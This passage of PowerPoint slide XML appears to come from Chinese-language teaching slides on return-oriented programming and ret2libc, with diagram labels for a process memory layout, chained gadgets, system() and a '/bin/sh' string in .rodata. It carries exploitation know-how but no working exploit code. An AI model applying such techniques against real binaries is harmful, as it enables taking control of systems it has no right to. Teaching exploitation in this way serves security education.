                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10921104" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6880043" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880046" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880043" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880042" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880041" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880042" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10763062" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6405436" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6405427" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6405427" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10763062" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11237654" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10763064" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11350521" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11350865" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc1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66D26DA7-449C-F9B3-43AF-191E861D00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829" y="741894"/>
            <a:ext cx="4511431" cy="1562235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8484C3FD-7807-1D3B-EFC2-7BE80E1351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094" y="3042290"/>
            <a:ext cx="6218459" cy="693480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D0798356-8E19-5152-B253-2EE7C8F59578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326354" y="2469877"/>
            <a:ext cx="5935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err="1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plt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表中有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system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，可以找到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system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的实际调用地址</a:t>
            </a:r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id="{66253E2F-552F-B481-C866-24F0B6F603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354" y="5279000"/>
            <a:ext cx="5791702" cy="190517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9164053F-FDC0-76F7-17C8-FF49BD370866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413094" y="4382439"/>
            <a:ext cx="5935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err="1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rodata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段中有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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh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字符串</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73935842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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
